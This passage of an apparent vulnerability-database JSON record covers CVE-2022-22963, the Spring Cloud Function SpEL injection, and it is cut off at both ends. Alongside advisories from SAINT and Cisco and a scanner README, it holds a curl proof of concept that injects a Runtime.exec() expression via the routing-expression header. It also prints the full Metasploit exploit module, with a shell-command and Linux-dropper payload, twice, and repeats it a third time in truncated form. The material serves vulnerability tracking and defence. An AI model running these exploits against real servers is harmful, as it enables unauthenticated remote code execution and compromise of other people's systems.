An attacker could provide a crafted Spring Expression language (SpEL) as a routing-expression that may result in access to local resources. \n\n### Resolution\n\nApply the patch referenced in the [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\n### References\n\n<https://tanzu.vmware.com/security/cve-2022-22963> \n\n\n### Limitations\n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "saint", "title": "Spring Cloud Function Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-05T00:00:00", "id": "SAINT:EA21934BE7986CEF27E73EAA38D7EB58", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/spring_cloud_function_rce", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T19:35:44", "description": "Added: 04/05/2022 \n\n\n### Background\n\n[Spring Cloud Function](<https://spring.io/projects/spring-cloud-function#overview>) abstracts all transport details and infrastructure, allowing developers to keep 
all familiar tools and processes and focus on business logic. \n\n### Problem\n\nSpring Cloud Function has remote code execution vulnerability. An attacker could provide a crafted Spring Expression language (SpEL) as a routing-expression that may result in access to local resources. \n\n### Resolution\n\nApply the patch referenced in the [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\n### References\n\n<https://tanzu.vmware.com/security/cve-2022-22963> \n\n\n### Limitations\n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "saint", "title": "Spring Cloud Function Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-05T00:00:00", "id": "SAINT:ACED9607933F401D5B0A59CB25D22B09", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/spring_cloud_function_rce", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:11", "description": 
"[](<https://blogger.googleusercontent.com/img/a/AVvXsEilWkK-FPAHhY2QeYOmsLsM-kP1C10az0AOqwJ_niOh9uN1mEZeepHZOtVxi-grt1ZtdY24_cFBoJNPX-0MksoeZtPnEknxVg_GyBumJdWB4TIadM3PpxhyFOT-oToifQDbxJBD3B2F5nR7kxEt6gKYVDAEiLqImwp-DUxjzKgdwb5mrgsKRqU3HDJK>)\n\n \n\n\nTo run the [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) SpringBoot application run this docker [container](<https://www.kitploit.com/search/label/Container> \"container\" ) [exposing](<https://www.kitploit.com/search/label/Exposing> \"exposing\" ) it to port 8080. Example:\n \n \n docker run -it -d -p 8080:8080 bobcheat/springboot-public \n \n\n## Exploit\n\nCurl command:\n \n \n curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\\\"touch /tmp/test\")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter' \n \n\nOr using [Burp](<https://www.kitploit.com/search/label/Burp> \"Burp\" ) suite:\n\n[](<https://github.com/darryk10/CVE-2022-22963/blob/main/burp-suite-exploit.png> \"$ \\(5\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEilWkK-FPAHhY2QeYOmsLsM-kP1C10az0AOqwJ_niOh9uN1mEZeepHZOtVxi-grt1ZtdY24_cFBoJNPX-0MksoeZtPnEknxVg_GyBumJdWB4TIadM3PpxhyFOT-oToifQDbxJBD3B2F5nR7kxEt6gKYVDAEiLqImwp-DUxjzKgdwb5mrgsKRqU3HDJK>)\n\n## Credits\n\n<https://github.com/hktalent/spring-spel-0day-poc>\n\n \n \n\n\n**[Download CVE-2022-22963](<https://github.com/darryk10/CVE-2022-22963> \"Download CVE-2022-22963\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T11:30:00", "type": 
"kitploit", "title": "CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T11:30:00", "id": "KITPLOIT:7586926896865819908", "href": "http://www.kitploit.com/2022/03/cve-2022-22963-poc-spring-java.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-24T21:41:15", "description": "# [](<https://blogger.googleusercontent.com/img/a/AVvXsEiq83rixQ33OKbmoWJi89WYHdc4DrLKjaF4Fb_oNC9eI-0dinGfghgU-ON86t-dvUArvvR4Uytjd8t4wjK3r0hSR6SojDsdxtk5oTYh9zXEVVj_Vwr5Jv4R77tpdZamnECE8jW0wK86UlAO3xZNSDsr5XlvkezzB-JxjKcV1r204vACkoGhTZ5kDzKX>)\n\n#### \n\n\n#### A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities\n\n[](<https://camo.githubusercontent.com/50b8ab2234bbab2c18588a670936521d1ff5e59d5ca623a9a462da51a3ceafab/68747470733a2f2f646b68396568776b697363342e636c6f756466726f6e742e6e65742f7374617469632f66696c65732f38623637376131622d376335332d343062312d393333652d6531306635373163386262382d737072696e67347368656c6c2d44656d6f2e706e67> \"A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities \\(2\\)\" 
)[](<https://blogger.googleusercontent.com/img/a/AVvXsEhwUOGEkZWllztaONh15l-vccNxhEwBTiFlTp4EjnrWMxaQLx2Jazoo4d04LSQWwsomwL48sBTjfRoxCS0VtEC6FgI6jUjnQBbh_-dcDCKxovaU-2Su5R2LIHzccE1YG7A-NPawwE7dEld8q-n6CbDiSLi9-bW_6pwV8bvM5HRiVN9UHYqE9Y71sv4c>)\n\n# Features\n\n * Support for lists of URLs.\n * Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).\n * Fuzzing for HTTP GET and POST methods.\n * Automatic validation of the [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) upon discovery.\n * Randomized and non-intrusive payloads.\n * WAF Bypass payloads.\n\n \n\n\n# Description\n\nThe Spring4Shell RCE is a critical vulnerability that FullHunt has been researching since it was released. We worked with our customers in scanning their environments for Spring4Shell and Spring Cloud RCE vulnerabilities.\n\nWe're open-sourcing an open detection scanning tool for discovering Spring4Shell (CVE-2022-22965) and Spring Cloud RCE (CVE-2022-22963) vulnerabilities. This shall be used by security teams to scan their infrastructure, as well as test for WAF bypasses that can result in achieving successful [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) of the organization's environment.\n\nIf your organization requires help, please contact (team at fullhunt.io) directly for a full attack surface [discovery](<https://www.kitploit.com/search/label/Discovery> \"discovery\" ) and scanning for the Spring4Shell vulnerabilities.\n\n# Usage\n\nManagement Platform. [\u2022] Secure your External Attack Surface with FullHunt.io. usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] optional arguments: -h, --help show this help message and exit -u URL, --url URL Check a single URL. 
-p PROXY, --proxy PROXY Send requests through proxy -l USEDLIST, --list USEDLIST Check a list of URLs. --payloads-file PAYLOADS_FILE Payloads file - [default: payloads.txt]. --waf-bypass Extend scans with WAF bypass payloads. --request-type REQUEST_TYPE Request Type: (get, post, all) - [Default: all]. --test-CVE-2022-22963 Test for [CVE-2022-22963](<https://www.kitploit.com/search/label/CVE-2022-22963> \"CVE-2022-22963\" ) (Spring Cloud RCE). \">\n \n \n $ ./spring4shell-scan.py -h \n [\u2022] CVE-2022-22965 - Spring4Shell RCE Scanner \n [\u2022] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. \n [\u2022] Secure your External Attack Surface with FullHunt.io. \n usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] \n \n optional arguments: \n -h, --help show this help message and exit \n -u URL, --url URL Check a single URL. \n -p PROXY, --proxy PROXY \n Send requests through proxy \n -l USEDLIST, --list USEDLIST \n Check a list of URLs. \n --payloads-file PAYLOADS_FILE \n Payloads file - [default: payloads.txt]. \n --waf-bypass Extend scans with WAF bypass payloads. \n --request-type REQUEST_TYPE \n Request Type: (get, post, all) - [Default: all]. 
\n --test-CVE-2022-22963 \n Test for CVE-2022-22963 (Spring Cloud RCE).\n\n## Scan a Single URL\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local\n\n## Discover WAF bypasses against the environment\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local --waf-bypass\n\n## Scan a list of URLs\n \n \n $ python3 spring4shell-scan.py -l urls.txt\n\n## Include checks for Spring Cloud RCE (CVE-2022-22963)\n \n \n $ python3 spring4shell-scan.py -l urls.txt --test-CVE-2022-22963 \n \n\n# Installation\n \n \n $ pip3 install -r requirements.txt \n \n\n# Docker Support\n \n \n git clone https://github.com/fullhunt/spring4shell-scan.git \n cd spring4shell-scan \n sudo docker build -t spring4shell-scan . \n sudo docker run -it --rm spring4shell-scan \n \n # With URL list \"urls.txt\" in current directory \n docker run -it --rm -v $PWD:/data spring4shell-scan -l /data/urls.txt\n\n# About FullHunt\n\nFullHunt is the next-generation attack surface management (ASM) platform. FullHunt enables companies to discover all of their attack surfaces, monitor them for exposure, and continuously scan them for the latest security vulnerabilities. All, in a single platform, and more.\n\nFullHunt provides an enterprise platform for organizations. The FullHunt Enterprise Platform provides extended scanning and capabilities for customers. FullHunt Enterprise platform allows organizations to closely monitor their external attack surface, and get detailed alerts about every single change that happens. Organizations around the world use the FullHunt Enterprise Platform to solve their continuous security and external attack surface security challenges.\n\n# Legal Disclaimer\n\nThis project is made for educational and ethical testing purposes only. Usage of spring4shell-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n# License\n\nThe project is licensed under MIT License.\n\n# Author\n\n_Mazin Ahmed_\n\n * Email: _mazin at FullHunt.io_\n * FullHunt: <https://fullhunt.io>\n * Website: <https://mazinahmed.net>\n * Twitter: <https://twitter.com/mazen160>\n * Linkedin: [http://linkedin.com/in/infosecmazinahmed](<https://linkedin.com/in/infosecmazinahmed> \"http://linkedin.com/in/infosecmazinahmed\" )\n \n \n\n\n**[Download Spring4Shell-Scan](<https://github.com/fullhunt/spring4shell-scan> \"Download Spring4Shell-Scan\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-24T21:30:00", "type": "kitploit", "title": "Spring4Shell-Scan - A Fully Automated, Reliable, And Accurate Scanner For Finding Spring4Shell And Spring Cloud RCE Vulnerabilities", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-24T21:30:00", "id": "KITPLOIT:6278364996548285306", "href": "http://www.kitploit.com/2022/04/spring4shell-scan-fully-automated.html", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2022-04-15T15:33:48", "description": "On March 29, 2022, the following critical vulnerability in the Spring Cloud Function Framework affecting releases 3.1.6, 3.2.2, and older unsupported releases was disclosed:\n\nCVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression\n\nFor a description of this vulnerability, see VMware Spring Framework Security Vulnerability Report [\"https://tanzu.vmware.com/security/cve-2022-22963\"].\n\nCisco's Response to This Vulnerability\n\nCisco accessed all products for impact from CVE-2022-22963. To help detect exploitation of this vulnerability, Cisco has released Snort rules at the following location: Talos Rule SID 59388 [\"https://www.snort.org/rule_docs/1-59388\"]\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH\"]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:45:00", "type": "cisco", "title": "Vulnerability in Spring Cloud Function Framework Affecting Cisco Products: March 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 
7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-15T15:31:28", "id": "CISCO-SA-JAVA-SPRING-SCF-RCE-DQRHHJXH", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2022-04-01T15:27:32", "description": "Although Spring Cloud Functions are not as widespread as the Log4j library, and should provide a good separation from the hosting server, some draw the line between the two, due to the ease of exploitation over HTTP/s. This new vulnerability will definitely result in many threat actors launching campaigns for crypto-mining, DDoS, and ransomware, and using it as a golden ticket to break into organizations for years to come.", "cvss3": {}, "published": "2022-03-31T19:30:00", "type": "akamaiblog", "title": "Spring Cloud Function SpEL Injection (CVE-2022-22963) Exploited in the Wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T19:30:00", "id": "AKAMAIBLOG:8B6AA3E3035869AEAE3021AB3F1EFE32", "href": "https://www.akamai.com/blog/security/spring-cloud-function", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2022-03-31T17:01:15", "description": "", "cvss3": {}, "published": "2022-03-31T00:00:00", "type": "packetstorm", "title": "Spring Cloud Function SpEL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T00:00:00", "id": "PACKETSTORM:166562", "href": "https://packetstormsecurity.com/files/166562/Spring-Cloud-Function-SpEL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework 
\n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Spring Cloud Function SpEL Injection', \n'Description' => %q{ \nSpring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using \nan unsafe evaluation context with user-provided queries. By crafting a request to the application and setting \nthe spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code \nexecution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message. \n}, \n'Author' => [ \n'm09u3r', # vulnerability discovery \n'hktalent', # github PoC \n'Spencer McIntyre' \n], \n'References' => [ \n['CVE', '2022-22963'], \n['URL', 'https://github.com/hktalent/spring-spel-0day-poc'], \n['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'], \n['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225'] \n], \n'DisclosureDate' => '2022-03-29', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'RPORT' => 8080, \n'TARGETURI' => '/functionRouter' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => 
normalize_uri(datastore['TARGETURI']) \n) \n \nreturn CheckCode::Unknown unless res \n \n# both vulnerable and patched servers respond with 500 and a JSON body with these keys \nreturn CheckCode::Safe unless res.code == 500 \nreturn CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set) \n \n# best we can do is detect that the service is running \nCheckCode::Detected \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI']), \n'headers' => { \n'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\" \n} \n) \n \nfail_with(Failure::Unreachable, 'Connection failed') if res.nil? \nfail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500 \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/166562/spring_cloud_function_spel_injection.rb.txt"}], "metasploit": [{"lastseen": "2022-03-31T19:28:48", "description": "Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code execution. 
Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.\n", "cvss3": {}, "published": "2022-03-30T22:38:41", "type": "metasploit", "title": "Spring Cloud Function SpEL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T13:01:08", "id": "MSF:EXPLOIT/MULTI/HTTP/SPRING_CLOUD_FUNCTION_SPEL_INJECTION/", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/spring_cloud_function_spel_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Cloud Function SpEL Injection',\n 'Description' => %q{\n Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using\n an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting\n the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code\n execution. 
Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.\n },\n 'Author' => [\n 'm09u3r', # vulnerability discovery\n 'hktalent', # github PoC\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-22963'],\n ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'],\n ['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225']\n ],\n 'DisclosureDate' => '2022-03-29',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 8080,\n 'TARGETURI' => '/functionRouter'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n )\n\n return CheckCode::Unknown unless res\n\n # both vulnerable and patched servers respond with 500 and a JSON body with these keys\n return CheckCode::Safe unless res.code == 500\n return CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set)\n\n # best we can do is detect that the service is running\n CheckCode::Detected\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = 
{})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/spring_cloud_function_spel_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2022-04-06T19:16:05", "description": "Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code execution. 
Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "zdt", "title": "Spring Cloud Function SpEL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T00:00:00", "id": "1337DAY-ID-37565", "href": "https://0day.today/exploit/description/37565", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Cloud Function SpEL Injection',\n 'Description' => %q{\n Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using\n an unsafe evaluation context with user-provided queries. 
By crafting a request to the application and setting\n the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code\n execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.\n },\n 'Author' => [\n 'm09u3r', # vulnerability discovery\n 'hktalent', # github PoC\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-22963'],\n ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'],\n ['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225']\n ],\n 'DisclosureDate' => '2022-03-29',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 